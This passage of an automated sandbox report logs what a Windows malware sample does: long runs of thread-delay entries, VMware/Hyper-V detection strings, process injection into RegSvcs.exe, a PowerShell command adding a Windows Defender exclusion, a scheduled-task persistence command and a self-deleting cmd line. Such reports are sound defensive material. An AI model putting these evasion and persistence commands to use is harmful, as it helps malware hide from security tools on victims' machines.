              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597337Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597196Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597093Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596984Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596874Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596546Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595998Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595421Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595298Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594952Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594624Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594515Jump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599748
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599638
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599520
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599399
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599280
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599169
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598922
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596171
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595833
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595587
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595469
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594922
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8623Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 968Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3869Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5984Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2309
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7534
              Source: C:\Users\user\Desktop\file.exe TID: 2968Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe TID: 7372Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599757Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598124Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597337Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597196Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597093Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596984Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596874Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596546Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595998Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595421Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595298Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594952Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594624Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594515Jump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599748
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599638
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599520
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599399
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599280
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599169
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598922
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596171
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595833
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595587
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595469
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594922
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484
              Source: RegSvcs.exe, 00000007.00000002.2267339974.000000000163A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: RegSvcs.exe, 00000007.00000002.2267339974.000000000163A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2312284421.000000000148C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe"Jump to behavior
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 424000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1169008Jump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 424000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1057008Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe"Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
